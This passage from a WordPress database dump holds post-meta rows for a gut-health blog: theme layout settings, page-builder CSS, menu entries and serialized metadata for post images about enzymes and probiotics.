!important;}'),(14162,5412,'qodef_page_content_behind_header_meta','no'),(14163,5412,'qodef_boxed_background_image_attachment_meta','fixed'),(14164,5412,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(14165,5412,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(14166,5412,'qodef_video_type_meta','social_networks'),(14167,5412,'qodef_audio_type_meta','social_networks'),(14168,5412,'qodef_post_skin','qodef-post-light-skin'),(14169,5412,'qodef_disable_vertical_header_background_image_meta','no'),(14170,5412,'qodef_disable_header_widget_logo_area_meta','no'),(14171,5412,'qodef_disable_header_widget_menu_area_meta','no'),(14172,5412,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(14173,5414,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(14174,5415,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(14177,5416,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(14178,5417,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(14250,5445,'_menu_item_type','post_type'),(14251,5445,'_menu_item_menu_item_parent','0'),(14252,5445,'_menu_item_object_id','4890'),(14253,5445,'_menu_item_object','page'),(14254,5445,'_menu_item_target',''),(14255,5445,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(14256,5445,'_menu_item_xfn',''),(14257,5445,'_menu_item_url',''),(14258,5445,'_menu_item_orphaned','1694497047'),(14259,5446,'_edit_lock','1697101625:1'),(14260,5447,'_wp_attached_file','2023/09/Enzymer.jpg'),(14261,5447,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:857;s:4:\"file\";s:19:\"2023/09/Enzymer.jpg\";s:8:\"filesize\";i:140560;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"Enzymer-300x214.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6098;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"Enzymer-1024x731.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:731;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39063;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"Enzymer-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3258;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"Enzymer-768x548.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:548;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24508;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:19:\"Enzymer-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19991;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:20:\"Enzymer-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37504;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:19:\"Enzymer-550x857.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:857;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28819;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:20:\"Enzymer-1100x857.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:857;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51312;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(14262,5447,'_wp_attachment_image_alt','How Enzymes can help'),(14263,5448,'_wp_attached_file','2023/09/diana-polekhina-v0ZjnfxnP60-unsplash-scaled.jpg'),(14264,5448,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:55:\"2023/09/diana-polekhina-v0ZjnfxnP60-unsplash-scaled.jpg\";s:8:\"filesize\";i:216903;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:48:\"diana-polekhina-v0ZjnfxnP60-unsplash-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4986;}s:5:\"large\";a:5:{s:4:\"file\";s:49:\"diana-polekhina-v0ZjnfxnP60-unsplash-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44035;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:48:\"diana-polekhina-v0ZjnfxnP60-unsplash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3089;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:48:\"diana-polekhina-v0ZjnfxnP60-unsplash-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25850;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:50:\"diana-polekhina-v0ZjnfxnP60-unsplash-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90364;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:50:\"diana-polekhina-v0ZjnfxnP60-unsplash-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:149001;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:48:\"diana-polekhina-v0ZjnfxnP60-unsplash-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24256;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:49:\"diana-polekhina-v0ZjnfxnP60-unsplash-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42284;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:49:\"diana-polekhina-v0ZjnfxnP60-unsplash-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52491;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:50:\"diana-polekhina-v0ZjnfxnP60-unsplash-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80081;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:40:\"diana-polekhina-v0ZjnfxnP60-unsplash.jpg\";}'),(14265,5449,'_wp_attached_file','2023/09/Pienapple-and-enzymes-scaled.jpg'),(14266,5449,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1707;s:6:\"height\";i:2560;s:4:\"file\";s:40:\"2023/09/Pienapple-and-enzymes-scaled.jpg\";s:8:\"filesize\";i:536852;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"Pienapple-and-enzymes-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13539;}s:5:\"large\";a:5:{s:4:\"file\";s:34:\"Pienapple-and-enzymes-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84961;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"Pienapple-and-enzymes-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7182;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:34:\"Pienapple-and-enzymes-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:102241;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:35:\"Pienapple-and-enzymes-1024x1536.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:171204;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:35:\"Pienapple-and-enzymes-1365x2048.jpg\";s:5:\"width\";i:1365;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:315139;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:33:\"Pienapple-and-enzymes-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47671;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:34:\"Pienapple-and-enzymes-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81236;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:34:\"Pienapple-and-enzymes-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69831;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:35:\"Pienapple-and-enzymes-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:150698;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:25:\"Pienapple-and-enzymes.jpg\";}'),(14285,5456,'_wp_attached_file','2023/09/The-Best-Probiotics-to-Support-Your-Gut-Health-DURING-Menopause-.docx'),(14269,5446,'_edit_last','1'),(14270,5446,'qodef_page_content_behind_header_meta','no'),(14271,5446,'qodef_boxed_background_image_attachment_meta','fixed'),(14272,5446,'qodef_blog_list_featured_image_meta','http://tummyrevolution.com/wp-content/uploads/2023/09/Enzymer.jpg'),(14273,5446,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(14274,5446,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(14275,5446,'qodef_post_gallery_images_meta','5447,5448,5449'),(14276,5446,'qodef_video_type_meta','social_networks'),(14277,5446,'qodef_audio_type_meta','social_networks'),(14278,5446,'qodef_post_skin','qodef-post-light-skin'),(14279,5446,'qodef_disable_vertical_header_background_image_meta','no'),(14280,5446,'qodef_disable_header_widget_logo_area_meta','no'),(14281,5446,'qodef_disable_header_widget_menu_area_meta','no'),(14286,5456,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:14873;}'),(14300,5448,'_wp_attachment_image_alt','Probiotics During Menopause'),(15007,5654,'qodef_boxed_background_image_attachment_meta','fixed'),(15008,5654,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(15009,5654,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(15010,5654,'qodef_video_type_meta','social_networks'),(15011,5654,'qodef_audio_type_meta','social_networks'),(15012,5654,'qodef_post_skin','qodef-post-light-skin'),(15013,5654,'qodef_disable_vertical_header_background_image_meta','no'),(15014,5654,'qodef_disable_header_widget_logo_area_meta','no'),(15015,5654,'qodef_disable_header_widget_menu_area_meta','no'),(15016,5586,'footnotes',''),(15017,5586,'_oembed_07c13d7995c21199c37d4172a703e31d',''),(15018,5586,'_oembed_time_07c13d7995c21199c37d4172a703e31d','1696842828'),(15025,5606,'footnotes',''),(15056,5679,'_edit_lock','1697101348:1'),(15071,5679,'_edit_last','1'),(15072,5679,'qodef_page_content_behind_header_meta','no'),(15073,5679,'qodef_boxed_background_image_attachment_meta','fixed'),(15074,5679,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(15075,5679,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(15076,5679,'qodef_video_type_meta','social_networks'),(15077,5679,'qodef_audio_type_meta','social_networks'),(15078,5679,'qodef_post_skin','qodef-post-light-skin'),(15079,5679,'qodef_disable_vertical_header_background_image_meta','no'),(15080,5679,'qodef_disable_header_widget_logo_area_meta','no'),(15081,5679,'qodef_disable_header_widget_menu_area_meta','no'),(15086,5694,'_edit_lock','1697101274:1'),(15087,5694,'_edit_last','1'),(15088,5694,'qodef_page_content_behind_header_meta','no'),(15089,5694,'qodef_boxed_background_image_attachment_meta','fixed'),(15090,5694,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(15091,5694,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(15092,5694,'qodef_video_type_meta','social_networks'),(15093,5694,'qodef_audio_type_meta','social_networks'),(15094,5694,'qodef_post_skin','qodef-post-light-skin'),(15095,5694,'qodef_disable_vertical_header_background_image_meta','no'),(15096,5694,'qodef_disable_header_widget_logo_area_meta','no'),(15097,5694,'qodef_disable_header_widget_menu_area_meta','no'),(15098,5464,'_wp_page_template','default'),(15100,5704,'_wp_attached_file','2023/10/pexels-kindel-media-7298670-scaled.jpg'),(15101,5704,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1442;s:4:\"file\";s:46:\"2023/10/pexels-kindel-media-7298670-scaled.jpg\";s:8:\"filesize\";i:698638;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:39:\"pexels-kindel-media-7298670-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11028;}s:5:\"large\";a:5:{s:4:\"file\";s:40:\"pexels-kindel-media-7298670-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:101298;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:39:\"pexels-kindel-media-7298670-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5748;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:39:\"pexels-kindel-media-7298670-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56512;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:40:\"pexels-kindel-media-7298670-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:240249;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:41:\"pexels-kindel-media-7298670-2048x1154.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1154;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:443922;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:39:\"pexels-kindel-media-7298670-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62170;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:40:\"pexels-kindel-media-7298670-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105139;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:40:\"pexels-kindel-media-7298670-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:157660;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:41:\"pexels-kindel-media-7298670-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:297609;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:31:\"pexels-kindel-media-7298670.jpg\";}'),(15102,5705,'_wp_attached_file','2023/10/pexels-kindel-media-7298675-scaled.jpg'),(15103,5705,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1442;s:4:\"file\";s:46:\"2023/10/pexels-kindel-media-7298675-scaled.jpg\";s:8:\"filesize\";i:545537;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:39:\"pexels-kindel-media-7298675-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10878;}s:5:\"large\";a:5:{s:4:\"file\";s:40:\"pexels-kindel-media-7298675-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91365;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:39:\"pexels-kindel-media-7298675-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5829;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:39:\"pexels-kindel-media-7298675-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52552;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:40:\"pexels-kindel-media-7298675-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:203805;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:41:\"pexels-kindel-media-7298675-2048x1154.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1154;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:355816;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:39:\"pexels-kindel-media-7298675-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56684;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:40:\"pexels-kindel-media-7298675-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95015;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:40:\"pexels-kindel-media-7298675-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:133643;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:41:\"pexels-kindel-media-7298675-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:243014;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:31:\"pexels-kindel-media-7298675.jpg\";}'),(15104,5706,'_wp_attached_file','2023/10/pexels-nataliya-vaitkevich-7615571-scaled.jpg'),(15105,5706,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:53:\"2023/10/pexels-nataliya-vaitkevich-7615571-scaled.jpg\";s:8:\"filesize\";i:648438;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:46:\"pexels-nataliya-vaitkevich-7615571-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11725;}s:5:\"large\";a:5:{s:4:\"file\";s:47:\"pexels-nataliya-vaitkevich-7615571-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88928;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:46:\"pexels-nataliya-vaitkevich-7615571-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6574;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:46:\"pexels-nataliya-vaitkevich-7615571-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52207;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:48:\"pexels-nataliya-vaitkevich-7615571-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:201177;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:48:\"pexels-nataliya-vaitkevich-7615571-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:380651;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:46:\"pexels-nataliya-vaitkevich-7615571-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48901;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:47:\"pexels-nataliya-vaitkevich-7615571-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85915;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:47:\"pexels-nataliya-vaitkevich-7615571-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:101445;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:48:\"pexels-nataliya-vaitkevich-7615571-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:175813;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:38:\"pexels-nataliya-vaitkevich-7615571.jpg\";}'),(15106,5707,'_wp_attached_file','2023/10/pexels-ready-made-3850790-scaled.jpg'),(15107,5707,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:44:\"2023/10/pexels-ready-made-3850790-scaled.jpg\";s:8:\"filesize\";i:563526;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"pexels-ready-made-3850790-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14858;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"pexels-ready-made-3850790-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100421;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"pexels-ready-made-3850790-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6538;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"pexels-ready-made-3850790-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62680;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"pexels-ready-made-3850790-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:203554;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:39:\"pexels-ready-made-3850790-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:356266;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:37:\"pexels-ready-made-3850790-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43262;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:38:\"pexels-ready-made-3850790-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87151;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:38:\"pexels-ready-made-3850790-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67890;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:39:\"pexels-ready-made-3850790-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:140338;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:29:\"pexels-ready-made-3850790.jpg\";}'),(15108,5708,'_wp_attached_file','2023/10/pexels-sora-shimazaki-5938391-scaled.jpg'),(15109,5708,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:48:\"2023/10/pexels-sora-shimazaki-5938391-scaled.jpg\";s:8:\"filesize\";i:342505;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:41:\"pexels-sora-shimazaki-5938391-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10434;}s:5:\"large\";a:5:{s:4:\"file\";s:42:\"pexels-sora-shimazaki-5938391-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74713;}s:9:\